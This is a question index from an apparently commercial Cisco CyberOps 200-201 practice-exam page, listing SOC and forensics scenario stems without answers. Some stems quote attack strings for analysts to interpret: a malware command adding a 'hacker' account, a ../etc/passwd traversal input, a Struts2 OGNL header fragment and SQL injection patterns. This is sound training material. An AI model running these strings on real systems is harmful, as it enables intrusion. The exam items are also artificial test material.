200-201 · domain
scenario questions
Practise Cisco CyberOps Associate 200-201 scenario questions practice questions — original exam-style scenarios with answer choices, explanations, and analysis of common mistakes.
Focused practice
Practice scenario questions questions
Scored sessions drawing only from this domain — pick a length below.
Start 20-question practice test →What this domain covers
What to know about scenario questions
scenario questions questions test whether you can apply the concept in context, not just recognise a definition.
How the topic appears in realistic exam-style scenarios.
Which detail in the question changes the correct answer.
How to eliminate plausible but wrong options.
How to connect the question back to the wider exam objective.
Watch out for
Common scenario questions exam traps
- ▸Answering from memory before reading the full scenario.
- ▸Missing a constraint such as cost, availability, security, scope or command context.
- ▸Choosing a broad answer when the question asks for the most specific fix.
- ▸Ignoring why the wrong options are tempting.
Question index
All scenario questions questions (968)
Click any question to see the full explanation, or start a practice session above.
A multinational manufacturer handles personal data of employees in several countries and wants to ensure its security program aligns with recognized international standards for establishing, implementing, maintaining, and continually improving an information security management system. Which framework should the security team adopt as the primary basis for this program?
Hard2An organization wants to ensure that a received email genuinely came from the claimed sender and has not been altered. Which cryptographic mechanism provides both authentication and integrity?
Hard3A healthcare organization must comply with HIPAA. Which THREE security measures are typically required under HIPAA? (Choose three.)
Medium4During a security audit, an analyst finds that a third-party vendor has access to sensitive customer data beyond what is necessary for their services. Which principle of least privilege should the policy enforce?
Hard5An analyst detects HTTPS traffic to a domain that was registered only 24 hours ago and has no web content. The traffic occurs at odd hours and with consistent packet sizes. What technique is likely being used for C2?
Easy6A SOC analyst is investigating a suspected network intrusion and reviews NetFlow records. The analyst observes a sudden increase in outbound traffic from a single internal host to an external IP address, with large data volumes during off-hours. Which two additional indicators should the analyst examine to confirm data exfiltration? (Choose two.)
Medium7An IDS/IPS alert shows a signature named 'ET POLICY Outgoing HTTP Request with Suspicious User-Agent' with severity high. What is the most likely next step for an analyst?
Medium8An organization wants to ensure that data sent over the internet cannot be read if intercepted. Which cryptographic method should be used?
Hard9A security analyst is monitoring network traffic and notices a large number of TCP SYN packets being sent to a single host on various ports. Which type of attack is most likely occurring?
Easy10A security analyst is analyzing a PCAP file in Wireshark and wants to isolate all HTTPS traffic. Which display filter should the analyst use?
Medium11A security analyst is reviewing a recent security incident where an attacker gained unauthorized access to a server. The analyst needs to determine which factors contributed to the incident by examining the vulnerability, threat, and risk. Which TWO of the following best describe the relationship between these concepts in this scenario? (Choose two.)
Hard12A company's security policy requires that all servers have host-based intrusion detection (HIDS) installed and configured to send alerts to the SIEM. During a routine check, you find that a critical database server has HIDS installed but is not sending alerts because the agent service is stopped. The server administrator says he stopped the service because it was using too much CPU. The policy requires that any deviation from baseline must be approved by the security team. What should you do?
Medium13A SOC analyst is tuning a SIEM correlation rule to detect port scanning. The rule should generate an alert when a single source IP connects to many different destination ports on multiple hosts within a short time. Which THREE conditions should be included in the rule?
Hard14In Zeek (Bro), which log file would an analyst examine to identify HTTP methods, URIs, and response codes from web traffic?
Hard15Which of the following is a common indicator of DNS tunneling used for exfiltration?
Medium16A security analyst is examining a Windows 10 host and suspects that an attacker has established persistence using a scheduled task. The analyst runs 'schtasks /query /fo LIST /v' and observes a task named 'WindowsUpdateCheck' with the action 'C:\Users\Public\update.exe' and a trigger set to run every 5 minutes. Which of the following best describes the attacker's technique?
Hard17An analyst is investigating a potential data exfiltration via DNS. In Zeek DNS logs, the analyst sees many queries for subdomains like 'a1b2c3.malicious.com', 'd4e5f6.malicious.com' etc. from an internal host. Which technique is likely being used?
Hard18Which TWO pieces of information are essential for an analyst to correlate when investigating an intrusion alert from a network-based sensor?
Easy19Which TWO of the following are best practices for configuring syslog in a secure monitoring environment? (Choose two.)
Easy20A security analyst is analyzing a suspicious PE file. Using a hex editor, the analyst sees the ASCII string 'MZ' at the beginning. What does this indicate?
Medium21You are a senior analyst in a SOC that monitors a large financial institution. The SIEM correlates events from firewalls, IDS, endpoints, and database servers. Over the past week, you have noticed multiple low-priority alerts from the IDS indicating 'ET SCAN NMAP -sS' scans from internal IP 10.0.0.50, which is a print server. The alerts occur at random times during business hours. The number of alerts has increased from 5 per day to 20 per day. The print server runs a standard OS and printer management software. No other alerts are triggered from that host. The firewall logs show outbound connections from the print server to IPs on the internet on port 443, which is abnormal for a print server. You check the printer management software and see no recent updates. The user of the print server, the IT administrator, reports no issues. What is your best course of action?
Hard22An analyst is examining a syslog message from a Cisco ASA showing: %ASA-4-106023: Deny udp src outside:192.0.2.1/123 dst inside:10.0.0.5/123. Which type of traffic is being denied?
Easy23A SOC analyst is reviewing a packet capture from an internal web server and notices that a single external IP sent 4,000 TCP segments with the ACK flag set to a closed port, and each segment received a RST response. No SYN packets preceded these segments. Which type of scan is this host most likely performing?
Medium24A SOC Tier 2 analyst is investigating an alert that was escalated by Tier 1. The analyst needs to perform deeper correlation and malware analysis. Which of the following actions is most appropriate for Tier 2?
Hard25Which TWO of the following are valid reasons to use a proxy server for security monitoring? (Choose two.)
Hard26During an incident, a SOC Tier 1 analyst identifies a series of failed login attempts from an internal IP address. The analyst escalates the alert. What is the primary role of a Tier 2 analyst in this scenario?
Medium27Which Windows registry hive contains user-specific configuration settings that can be modified by applications?
Easy28A security auditor reviews the SNMP configuration. Which security concern should be reported?
Hard29Which TWO network behaviors suggest an ARP spoofing attack is occurring? (Choose two.)
Hard30A security analyst observes repeated failed login attempts from a single external IP address, causing the authentication server to become unresponsive. Which type of attack is occurring?
Medium31Which SOC tier is responsible for threat hunting and advanced forensic analysis?
Easy32Drag and drop the steps to configure a VLAN on a Cisco switch into the correct order.
Medium33Based on the exhibit, what does the sequence of events indicate?
Hard34Which organization facilitates threat intelligence sharing among members in a specific sector, such as finance or healthcare?
Easy35A Cisco Firepower appliance generates an intrusion specific event with the message 'MALWARE-CNC generic command and control traffic detected'. The analyst needs to determine if the alert is a true positive. Which additional data source would provide the most corroborating evidence?
Hard36An attacker uses a tool to capture keystrokes on a compromised system. What type of malware is most likely in use?
Medium37A security analyst is reviewing logs and notices that an attacker has intercepted and modified communications between two devices on the same network. Which attack technique is being used?
Medium38An analyst is examining a Linux system for signs of an attacker establishing persistence. Which TWO of the following locations should the analyst check? (Choose two.)
Medium39A security manager is developing a business continuity plan (BCP) for a critical e-commerce application. The application has a recovery time objective (RTO) of 4 hours and a recovery point objective (RPO) of 15 minutes. The manager must choose a backup strategy that meets these objectives. Which strategy is most appropriate?
Medium40An analyst is configuring a Snort rule to detect a known exploit targeting Apache web servers. The exploit sends a malicious HTTP POST request with a long User-Agent string. Which Snort rule header and options are most appropriate?
Hard41An analyst is triaging a suspected FTP brute-force campaign against an internal server. The IDS reports many failed authentication attempts from a single external address. Which TWO data points, gathered from the FTP server and network logs, most directly support confirming and characterizing the attack? (Choose two.)
Hard42An analyst is examining a Windows 10 host and discovers that a service named 'WinDefendSvc' is registered with a binary path of C:\ProgramData\svchost.exe and a display name of 'Windows Defender Service'. The legitimate Windows Defender service uses a different name and binary path. Which conclusion is most accurate?
Hard43A security analyst is examining a PCAP and observes a TCP stream where the client sends a single packet with the PSH, ACK flags set, and the server responds with a single packet with the RST, ACK flags set. The client then sends no further packets. What is the most likely explanation for this behavior?
Hard44Refer to the exhibit. What does this syslog message indicate?
Easy45Refer to the exhibit. What type of activity does this log represent?
Easy46A security analyst is investigating an alert that indicates a potential SQL injection attack. Which of the following HTTP request patterns is most indicative of a SQL injection attempt?
Easy47A security analyst observes a sudden spike in outbound traffic from a critical server to an external IP address on TCP port 443. The server is a web application server that normally only receives inbound connections. Which type of intrusion is most likely occurring?
Hard48Which protocol and port pair is commonly used for secure web traffic?
Easy49When analyzing a suspicious PE file, the analyst calculates the file's entropy and finds it to be 7.8. What does a high entropy value typically indicate, and why is it relevant to malware analysis?
Hard50A security analyst is investigating a Windows host for signs of fileless malware. The analyst runs a memory analysis tool and observes a process named 'powershell.exe' with a parent process of 'winword.exe'. The command line includes '-enc' followed by a long base64 string. Which technique is most likely being used by the attacker?
Hard51You are a security analyst for a financial institution. Over the past hour, the intrusion detection system has generated multiple alerts for outbound traffic from a single internal host (10.0.0.50) to various external IP addresses on port 443. The alerts indicate that the host is making HTTPS connections to IPs that are associated with known command and control servers. Additionally, the host has been observed making DNS queries for domains that are algorithmically generated (e.g., rgj3k2.example.com, fh7d8s.example.net). The host is a Windows 10 workstation used by an employee in the accounting department. The employee reports that they have not noticed any unusual behavior, but they did click on a link in a phishing email yesterday. The network administrator confirms that the host's firewall rules allow outbound HTTPS traffic. You have access to endpoint logs, network flow data, and packet captures. Which course of action should you take FIRST?
Hard52A security analyst is selecting a symmetric encryption algorithm for encrypting data at rest. Which of the following is a suitable symmetric algorithm?
Hard53An investigator seizes a laptop as evidence from a crime scene. At the scene, the laptop is turned on and a log file is open. What should the investigator do to preserve evidence according to chain of custody procedures?
Hard54A security team wants to adopt a framework that provides a common language for describing cyberthreats, including tactics, techniques, and procedures observed in real intrusions. Which framework should the team use to map adversary behavior?
Hard55A security analyst is tasked with developing a data loss prevention (DLP) strategy for the organization. The strategy must align with the CyberOps Associate curriculum and address both endpoint and network-based data exfiltration. Which two actions should the analyst include in the strategy? (Choose two.)
Hard56A security analyst is investigating an alert that indicates a host is sending a large number of DNS queries to an external domain. The analyst wants to determine if the traffic is malicious and if it is using a DNS tunnel. Which type of analysis should the analyst perform to confirm the presence of a DNS tunnel?
Medium57What is the primary difference between symmetric and asymmetric encryption?
Medium58An analyst identifies a series of SMB authentication attempts from a compromised host to multiple internal servers. The authentication uses NTLM hashes. Which TWO techniques are most likely being used for lateral movement? (Select 2)
Medium59A network administrator has configured a SPAN port to send traffic to an intrusion detection system (IDS). However, the IDS is not seeing traffic from a specific VLAN. What is the most likely cause?
Easy60What is the primary goal of the 'integrity' pillar of the CIA triad?
Easy61An IDS alert indicates that a server received HTTP requests containing long strings of the form ../../../../etc/passwd in a URL parameter. The web server returned HTTP 200 responses to these requests. Which conclusion should the analyst draw while continuing the investigation?
Medium62You are analyzing network traffic from a compromised host. The host is running Windows and is connected to a corporate network. The IDS generated an alert for a known malware signature matching traffic from the host to an external IP on port 443. However, you see that the traffic is encrypted and the destination IP is a cloud storage provider. The host also shows periodic DNS queries to a domain that closely resembles the cloud provider's domain but with a single character difference (typosquatting). The employee on that host reports no unusual activity. Which step should you take first to confirm the compromise?
Medium63A security analyst is reviewing a suspicious email reported by a user. The email appears to come from the CEO and requests an urgent wire transfer. The analyst examines the email headers and notices that the 'From' address is spoofed and the 'Reply-To' address is different from the 'From' address. The email also contains a link to a credential-harvesting page. Which type of attack is this?
Hard64A company's security policy states that all network traffic must be inspected by an IPS. However, encrypted traffic (SSL/TLS) is bypassing inspection. The network team wants to implement SSL decryption. What is the primary policy consideration before implementing?
Hard65A security analyst is examining a suspicious executable found on a compromised host. The analyst runs the command 'strings malware.exe' and sees the string 'cmd.exe /c net user hacker P@ssw0rd /add'. What is the most likely intent of this command?
Easy66Which Windows artifact stores evidence of file execution, including the path and run count, and is located in C:\Windows\Prefetch?
Easy67A Linux administrator checks authentication logs to investigate a possible brute-force attack. Which log file typically contains records of successful and failed SSH login attempts?
Easy68A network administrator is using Cisco ISE to monitor endpoint authentication. Which report provides details on failed authentication attempts and the reasons?
Easy69During a risk assessment, a company identifies that the annualized loss expectancy (ALE) for a specific threat is $50,000. The cost to implement a mitigation control is $30,000 with an annual maintenance cost of $5,000. According to risk management principles, what is the most appropriate risk treatment option?
Hard70Which Wireshark filter can be used to extract the full TCP data of a specific conversation from a PCAP?
Medium71A network analyst is examining a packet capture and notices a series of TCP packets where the client sends a SYN, the server responds with SYN-ACK, and the client never sends an ACK. The client repeats this for many destination ports on the same server. Which conclusion is most accurate?
Medium72An organization wants to ensure that security logs are tamper-proof and available for forensic analysis. Which logging best practice should be implemented?
Easy73An analyst is tuning Snort IDS rules and wants to reduce false positives. Which TWO rule options can be adjusted to decrease sensitivity?
Hard74An organization is implementing a security policy that requires all remote access to the corporate network to be authenticated using multi-factor authentication (MFA). Which TWO of the following are valid MFA factors?
Medium75During a security monitoring review, an analyst notices an unusual amount of traffic on port 445. Which protocol is most likely associated with this port?
Easy76An organization is implementing an AUP that prohibits personal use of corporate resources. However, an employee uses a company laptop to access personal email, which leads to a malware infection. Which policy violation is most directly implicated?
Hard77A security policy requires that all mobile devices connecting to corporate email must have a screen lock and be able to be remotely wiped. An employee's personal phone is lost. The employee reports the loss immediately. The phone is enrolled in MDM with remote wipe capability. However, the employee has not set a screen lock, violating policy. The phone contains synced email and contacts. What should the security team do?
Medium78A SOC Tier 3 analyst is performing threat hunting. Which activity best describes the primary focus of a Tier 3 analyst?
Hard79A security analyst is examining a suspicious executable found on a user's workstation. The file appears to be a legitimate PDF document but when opened, it executes code that encrypts the user's files and demands payment. The analyst determines that the file is actually a malicious program disguised as a benign file. Which type of malware is this?
Easy80An analyst is examining a PCAP file for signs of lateral movement. Which TWO of the following are typical indicators of lateral movement using pass-the-hash?
Medium81An analyst is reviewing Sysmon logs on a Windows host and sees Event ID 1 (process creation) with a signed parent process but an unsigned child. The child has a CommandLine that includes 'powershell -EncodedCommand'. What is the most likely threat?
Hard82During network intrusion analysis, an analyst reviews logs and observes an alert for a TCP SYN scan. Which characteristic of a SYN scan would the analyst look for in packet captures?
Easy83An analyst uses Volatility on a memory dump and runs the 'pstree' command. What specific information does this provide compared to 'pslist'?
Medium84A security analyst is investigating a potential data exfiltration incident. The analyst observes that a large amount of data is being transferred from an internal database server to an external IP address during non-business hours. The transfer is using an encrypted channel that is not typical for the server's normal operations. Which type of threat is this activity most likely associated with?
Medium85Which security principle ensures that a user cannot deny having performed an action?
Medium86During incident response, a security analyst reviews a PCAP file and sees TCP packets with only the SYN flag set, followed by RST packets upon receiving a SYN-ACK. No connection is established. Which scanning technique is being used?
Hard87Which cryptographic method uses the same key for both encryption and decryption, and is typically faster than asymmetric encryption?
Medium88Which TWO of the following are examples of malware that rely on user interaction to spread? (Select two.)
Easy89A security team implements an IPS that uses behavioral profiling. Which type of detection method is being used?
Hard90An organization's security policy defines acceptable use of corporate email. Which THREE of the following actions are typically prohibited?
Easy91A Cisco Stealthwatch analyst notices a host on the internal network is sending periodic DNS queries to a single external domain with subdomains that are long, random-looking strings (e.g., a8f3k2j9d0x1.example.com). The queries occur every 60 seconds, and the responses are consistently NXDOMAIN. Which type of malicious activity does this pattern most strongly indicate?
Medium92An analyst is examining a suspicious executable recovered from a compromised host. Static analysis shows it is packed, and dynamic analysis in a sandbox reveals it creates a mutex, modifies registry Run keys, and attempts to connect to a hardcoded IP address on port 443. The file also contains a section with high entropy. Which characteristic most strongly suggests the file is packed or encrypted?
Medium93During a security incident, a security analyst isolates an affected host and collects a memory dump. According to incident response procedures, what is the next step the analyst should take?
Medium94A security analyst is notified that an employee's laptop was stolen. The laptop contains sensitive customer data. Which type of threat does this incident represent?
Easy95An analyst reviews the Cisco ASA syslog message shown in the exhibit. What does this entry indicate?
Medium96When performing file analysis, which method is most reliable for determining the actual file type regardless of its extension?
Easy97A SOC analyst is reviewing firewall logs and sees repeated outbound connections from an internal server to an external IP on TCP port 443, but the traffic is not TLS. Packet capture shows a custom binary protocol with periodic small keepalives. Which type of malicious activity is most consistent with these findings?
Hard98A SOC analyst is investigating a potential security incident involving a Windows workstation. The analyst has collected network traffic and host logs. Which two artifacts would provide the most direct evidence of a Pass-the-Hash attack? (Choose two.)
Hard99A security analyst is investigating a Linux server that was compromised. The attacker used a rootkit to hide processes and files. The analyst runs 'lsmod' and notices a kernel module named 'hideproc' that is not recognized. Which command should the analyst use to determine the module's file path and potentially identify the rootkit?
Hard100A new security analyst is reviewing the organization's data classification policy and notices that data labeled 'Restricted' must be encrypted at rest and in transit, while data labeled 'Internal' has no encryption requirement. The analyst asks why the policy distinguishes between these levels. What is the primary purpose of a data classification policy?
Easy101In network forensics, which Wireshark filter would be used to reconstruct a TCP conversation between two hosts?
Easy102A Cisco Firepower analyst inspects an inline intrusion policy event where the packet was dropped but only a partial payload was captured. The analyst wants to confirm whether the attack was successful on the target host. Which data source should be correlated with the Firepower event?
Medium103A SOC analyst is reviewing Cisco Firepower and NetFlow records for a suspected lateral movement campaign inside the corporate network. Which TWO monitoring observations most strongly support the hypothesis that an attacker is moving laterally using SMB? (Choose two.)
Hard104An organization is reviewing its exposure to attack surface. A security architect notes that employees routinely install browser extensions from unapproved sources, and several internal web applications accept unsanitized input. Which concept do these findings primarily describe?
Medium105A SOC analyst is triaging a Cisco Stealthwatch alarm that shows a workstation uploading 4 GB to an external IP address at 02:00, outside normal business hours. The destination has no prior reputation data. Which action should the analyst take first according to the incident response process?
Easy106Refer to the exhibit. A security analyst is reviewing the ASA configuration. Which traffic will be permitted from the outside interface?
Hard107An analyst is reviewing PCAP and sees a TCP stream with a Wireshark filter 'tcp.stream eq 0'. The conversation shows an interactive shell session with commands like 'whoami' and 'ls'. This is most likely evidence of what?
Medium108An incident response plan specifies that containment must be completed before eradication. A security analyst identifies a malware infection on a critical server. What should be done first?
Medium109An analyst is investigating a potential DNS tunneling attack. Which characteristic in DNS traffic would most likely indicate DNS tunneling?
Easy110A security analyst is evaluating the risk of a new vulnerability in a web application. The vulnerability has a CVSS base score of 9.8 and is remotely exploitable without authentication. The application is internet-facing and processes sensitive customer data. Which risk response strategy is MOST appropriate according to risk management principles?
Hard111In a PCAP analysis, an analyst uses the filter 'http.request.uri contains "UNION"' and finds multiple HTTP requests with 'SELECT' and 'UNION SELECT' in the URI parameter. Which type of attack is likely occurring?
Easy112Which THREE indicators are commonly found in network traffic that suggest a host is part of a botnet? (Choose three.)
Medium113Which TWO are examples of technical security controls? (Select two.)
Easy114A SOC analyst is tuning IDS signatures and notices that a particular signature triggers frequently on legitimate traffic from a specific internal application. The signature has a high false positive rate. What is the best action to take?
Medium115During packet analysis in Wireshark, which THREE findings are indicators of potential malicious activity? (Choose THREE.)
Hard116A firewall log shows repeated denied packets from IP 10.0.0.5 to destination 192.168.1.10 on port 22. What is the most likely attack?
Medium117Which log source would provide the most detailed information about HTTP requests, including URLs and user agents?
Medium118An organization is implementing a threat intelligence sharing program. Which THREE elements are commonly used standards or platforms for sharing threat intelligence?
Hard119During a security audit, it is discovered that an organization’s network is vulnerable to ARP spoofing attacks. Which type of attack could result from exploiting this vulnerability?
Hard120A host is infected with malware that uses DNS tunneling to exfiltrate data. Which type of analysis would best detect this activity?
Medium121Refer to the exhibit. A network administrator notices that remote SSH logins to the router succeed, but the router is not sending accounting records. Based on the configuration, what is the most likely cause?
Hard122A network baseline shows that a server typically sends 1-2 MB of data per hour to external IPs. Suddenly, the server sends 50 MB of data to an IP in a foreign country within 10 minutes. The traffic is encrypted. Which monitoring tool would best confirm data exfiltration?
Hard123A security analyst is examining system logs for signs of privilege escalation. Which THREE events are most relevant to detect such activity?
Medium124During memory analysis using Volatility, an analyst wants to identify processes with suspicious network connections and potentially injected code. Which THREE plugins should the analyst use? (Select THREE)
Medium125An analyst is reviewing a PCAP and observes a TCP stream where the client sends a packet with the PSH and ACK flags set, containing an HTTP GET request. The server responds with a packet with the FIN and ACK flags set, but the client continues to send data. Later, the client sends a packet with the RST flag set. Which statement best describes what is happening?
Hard126A security analyst is classifying security controls for a new data center. Which TWO of the following are examples of physical controls? (Choose two.)
Medium127A security engineer is designing a network to prevent an attacker who gains access to a web server from easily pivoting to the internal database server. Which architecture best achieves this goal?
Hard128A security analyst is reviewing firewall logs and notices a high number of denied outbound connections from an internal workstation to various external IP addresses on port 445 (SMB). What is the most likely explanation for this activity?
Medium129Which two are best practices for deploying network-based intrusion detection systems? (Choose two.)
Easy130You are a cybersecurity analyst in a SOC. The company uses a combination of Snort NIDS and Windows Event Log monitoring. At 3:00 PM, you receive a critical alert: 'ET TROJAN Observed Malicious SSL Certificate (Fake Google)'. The alert shows that a workstation (IP 10.0.1.45) initiated an SSL connection to IP 192.0.2.10 on port 443. The certificate presented by the server is self-signed and claims to be 'google.com'. The destination IP is not in any known Google IP range. You check the firewall logs and see that the outbound connection was allowed. The workstation's host logs show that the user is a marketing employee who frequently accesses webmail. The user reports no unusual behavior. You also check the company's web proxy logs and see that the user accessed 'http://www.google.com' earlier today, but the SSL connection is to a different IP. What should be your next step?
Medium131An analyst is examining a suspicious file that appears to be a PDF but when checking the magic bytes at offset 0, sees '50 4B 03 04'. What does this indicate?
Medium132A security analyst is examining a Cisco Umbrella Investigate report for a domain that has been flagged as malicious. The report shows a high 'security score' and lists multiple categories including 'Malware' and 'Command and Control'. Which action should the analyst take first?
Easy133A junior SOC analyst receives an alert indicating that a workstation attempted to resolve a domain associated with a known malware family. The analyst wants to determine whether the workstation actually connected to the malicious domain or if the resolution attempt was blocked. Which data source would most directly answer this question?
Easy134A security analyst reviews the firewall log. What is the most likely reason for the denied connection?
Easy135Which TWO of the following are best practices when configuring a SIEM for security monitoring?
Medium136You are a security analyst for a medium-sized enterprise. The network includes a DMZ with a web server (10.0.1.10) and a database server (10.0.2.10) in the internal network. Users access the web server via HTTPS from the internet. The web server queries the database server on TCP 3306. Recently, users reported that the web application sometimes returns database errors. You review firewall logs and see the following: - Allowed inbound HTTPS to 10.0.1.10 from various external IPs. - Denied outbound from 10.0.1.10 to 10.0.2.10 on port 3306. - Allowed outbound from 10.0.1.10 to external IPs on port 443. You also notice that the web server's outbound traffic to the database server is being blocked. The firewall has a default deny rule. Which action should you take to restore normal operation while maintaining security?
Hard137An analyst is examining a PCAP and sees a series of TCP packets where the client sends a SYN, receives a SYN-ACK, and then sends an ACK. Immediately after, the client sends a packet with the RST flag set, terminating the connection before any application data is exchanged. This pattern repeats across many destination ports on the same server. Which activity does this most likely represent?
Hard138A security engineer is implementing controls to meet compliance requirements. Which TWO of the following frameworks are specifically designed for protecting personal data?
Medium139A SOC team is implementing a security monitoring solution for a cloud-based infrastructure. Which of the following is the most important consideration for effective monitoring?
Hard140An analyst is reviewing Cisco Firepower intrusion events and sees an alert for a TCP connection to an internal web server on port 80 with the rule message 'SERVER-WEBAPP Apache Struts2 remote code execution attempt'. The packet payload contains the string 'Content-Type: %{(#_='multipart/form-data')'. The server is running Apache Struts2 version 2.3.15. What should the analyst do next?
Hard141An organization uses both network-based intrusion detection (NIDS) and host-based intrusion detection (HIDS). A HIDS alert reports that a critical server's registry key was modified. The NIDS shows no corresponding network activity. The change occurred during a scheduled maintenance window. What is the best course of action for the analyst?
Medium142A security analyst is examining a Linux server that is suspected of being compromised. The analyst runs `ls -l /proc/<PID>/exe` for a suspicious process and sees that the symbolic link points to `/tmp/.hidden/update` but the file no longer exists on disk. Which conclusion is most accurate?
Hard143Which OSI layer is responsible for logical addressing and routing, and is commonly targeted by IP spoofing attacks?
Easy144An analyst sees an alert: 'ET POLICY Outgoing HTTP Request with Suspicious User-Agent (Mozilla/5.0 compatible; MSIE 6.0; Windows NT 5.1)'. The source is an internal host that typically uses Windows 10. What should the analyst suspect?
Medium145During an intrusion investigation, an analyst needs to determine whether a specific internal host communicated with a known malicious IP address. The analyst has full packet capture for the relevant window but only wants to see the TCP stream from that host to the suspect address. Which Wireshark display filter isolates that conversation?
Easy146A security analyst at a mid-sized company is reviewing a packet capture from the DMZ and notices a series of TCP SYN packets sent to multiple ports on a single internal web server, all originating from the same external IP address within a 3-second window. None of the SYN packets are followed by a completed three-way handshake. The analyst must classify this activity to determine the appropriate response. Which type of attack is most consistent with this traffic pattern?
Medium147An organization is reviewing its risk management process and identifies a risk with a high probability and high impact. Management decides to stop the activity causing the risk. Which risk treatment option is being applied?
Medium148Refer to the exhibit. A security analyst reviews the ACL configuration applied outbound on the external interface. Which statement is true about traffic from the 192.168.1.0/24 network to the internet?
Medium149Which risk treatment option involves implementing security controls to reduce the likelihood or impact of a risk?
Easy150Which TWO of the following are common network security protocols? (Choose two.)
Medium151A security team is implementing a defense-in-depth strategy and wants to ensure that even if an attacker compromises a web server, the attacker cannot easily move laterally to the internal database server. Which security principle is being applied when the team segments the network and restricts traffic between the web tier and the database tier?
Easy152Which THREE of the following are key principles of zero trust security? (Choose three.)
Hard153Which TWO locations in a Linux filesystem should be checked for evidence of malware persistence?
Hard154A network engineer is designing a segmented network to protect a sensitive database. The database must be accessible only from a specific application server. Which security concept best describes this design?
Hard155A company's legal counsel is involved in an incident response due to a data breach. What is the primary role of legal counsel during the incident?
Medium156A security analyst is reviewing firewall logs and notices a rule that denies traffic from source IP 10.0.0.5 to destination port 3389. What service is being blocked?
Medium157A security analyst is investigating a Windows host suspected of malware infection. Which tool would allow the analyst to view parent-child relationships of running processes and inspect command line arguments?
Easy158Which risk treatment option involves taking actions to reduce the likelihood or impact of a risk?
Easy159A company's remote access policy requires VPN connections to use two-factor authentication (2FA). An employee reports they cannot connect because their token is not syncing. What is the best course of action?
Medium160An organization's incident response team has identified a malware infection on a critical server. They need to collect evidence for potential legal action. Which of the following is the most important step to ensure the admissibility of the evidence?
Hard161Which type of traffic is most prominent in this NetFlow data?
Hard162A multinational retailer is aligning its security program with the NIST Cybersecurity Framework. The CISO wants to prioritize activities that improve the ability to detect and respond to cybersecurity events. Which Function in the NIST CSF Core is specifically described as encompassing activities to identify the occurrence of a cybersecurity event?
Medium163You are a security analyst at a mid-sized company. The company uses a SIEM to collect logs from firewalls, IDS, and servers. Recently, the SIEM generated an alert for a potential brute-force attack against the company's VPN server. The alert is based on a correlation rule that triggers when more than 30 failed authentication attempts from a single source IP occur within 10 minutes. You investigate and see that the source IP is 203.0.113.50, which is a known IP address of a partner company that uses the VPN for remote access. The failed attempts are all from the same username 'john.doe'. You also notice that the attempts are happening every 5 seconds, exactly 6 attempts per minute. The partner company has a policy that locks accounts after 3 failed attempts. Based on this scenario, what is the most likely cause of the alert?
Easy164Which Cisco tool provides network-wide visibility and can detect anomalies using NetFlow and behavioral analysis?
Easy165An analyst is examining a Linux server and notices an unusual systemd service that starts automatically. Which command would be used to disable this service?
Medium166An analyst reviews network logs and sees a large outbound FTP transfer of 500 MB from a workstation to an external IP at 2:00 AM. The workstation regularly sends 10 MB daily. What should the analyst suspect?
Medium167A security analyst is reviewing the organization's data classification policy. The policy defines four levels: Public, Internal, Confidential, and Restricted. Which TWO handling requirements are typically associated with data classified as 'Restricted'? (Choose two.)
Hard168An analyst notices that an internal host is sending periodic ICMP echo requests to an external IP, and the echo replies contain payloads that are longer than the default Windows ping payload. The payload bytes appear to be encoded and change with each reply. Which activity is most likely occurring?
Medium169During alert triage, an analyst determines that an alert fired but no actual attack or malicious activity occurred on the network. How should this alert be classified?
Easy170A SOC analyst receives an alert that a user account successfully authenticated to the VPN from two geographically distant locations within four minutes. Both sessions remain active. The identity team confirms the user is traveling and has only one device. Which monitoring conclusion is most appropriate?
Easy171Which of the following best describes a vulnerability?
Easy172Which TWO actions are recommended when tuning IDS signatures to reduce false positives?
Medium173A security analyst is reviewing a Windows system for signs of malware persistence. The analyst notices a suspicious executable named 'updater.exe' in the Startup folder. Which Windows feature is being abused by the malware in this scenario?
Easy174Match each network protocol to its well-known port number.
Medium175Which component of a SIEM is responsible for converting log data from various sources into a standard format?
Medium176During a security incident, an analyst captures network traffic and observes multiple connections from an internal host to a remote IP on port 4444, with irregular packet timing and small payloads. Which type of activity is most likely indicated?
Medium177An organization experiences a ransomware attack where files are encrypted and a ransom is demanded. Which element of the CIA triad is most directly impacted?
Medium178An organization's security policy requires data classification labels to be applied to all documents. A manager sends a spreadsheet containing employee PII (personally identifiable information) to the entire company without labeling. Which policy has been violated?
Hard179Which two are common techniques used in network intrusion analysis? (Choose two.)
Easy180An alert shows a high volume of outbound traffic from an internal host to an external IP using FTP. The data includes files with names matching internal document names. This activity is most likely:
Hard181A security analyst is examining a suspicious file and calculates its SHA-256 hash. The analyst then queries Cisco Talos Intelligence for the hash. The result shows that the file is known malware with a detection name of 'Trojan.GenericKD.123456'. Which of the following does this result indicate?
Easy182An organization is required to preserve data that may be relevant to a lawsuit. Which legal process is invoked to prevent destruction of this data?
Hard183Which THREE of the following are common indicators of compromise (IOCs) that a security monitoring system might trigger on?
Easy184Which TWO of the following are valid reasons to create an exception to a security policy? (Choose two.)
Hard185An organization wants to implement a security framework that includes functions such as Identify, Protect, Detect, Respond, and Recover. Which framework aligns with this structure?
Hard186Which TWO of the following are common sources of security events used in security monitoring?
Easy187During a penetration test, a security engineer uses publicly available information from LinkedIn and Google to gather details about employees and organizational structure. Which type of reconnaissance is being performed?
Hard188A healthcare organization is developing an incident response plan. The security manager wants to ensure that the plan includes a phase where the team practices and tests their response capabilities before an actual incident occurs. According to the NIST incident response lifecycle, which phase involves preparing and preventing incidents through activities like training and exercises?
Easy189An analyst examining a PCAP sees a host send an HTTP GET request where the User-Agent string contains a long, random-looking hexadecimal value, the request path includes a similarly random string, and the server responds with a 404 status code but a response body of several kilobytes. This pattern repeats every 60 seconds. Which activity is most likely occurring?
Hard190A large e-commerce company experiences a data breach where customer credit card numbers are stolen. The investigation reveals that an attacker exploited a SQL injection vulnerability in the web application to extract the data from the database. The company's web development team claims they use parameterized queries and prepared statements. However, the forensic analysis shows that the injection occurred through a search functionality that concatenates user input directly into the SQL query. The application logs indicate that the search function was developed by a third-party vendor and integrated into the application six months ago. The company wants to prevent such incidents in the future. Which of the following is the most effective long-term solution?
Hard191A security analyst is reviewing the organization's defense-in-depth strategy. The analyst must recommend TWO controls that specifically reduce the risk of successful phishing attacks against employees. Which two controls should the analyst recommend? (Choose two.)
Medium192A security analyst is investigating a recent security incident and needs to determine the extent of the compromise. The analyst wants to understand which systems were affected and what data may have been accessed. Which phase of the incident response process is the analyst currently performing?
Medium193A security analyst is configuring a new SIEM platform. The organization has multiple log sources, including Windows Event Logs, Linux syslog, and firewall logs. The analyst wants to ensure that logs are not lost if the SIEM becomes unavailable. Which approach best addresses this requirement?
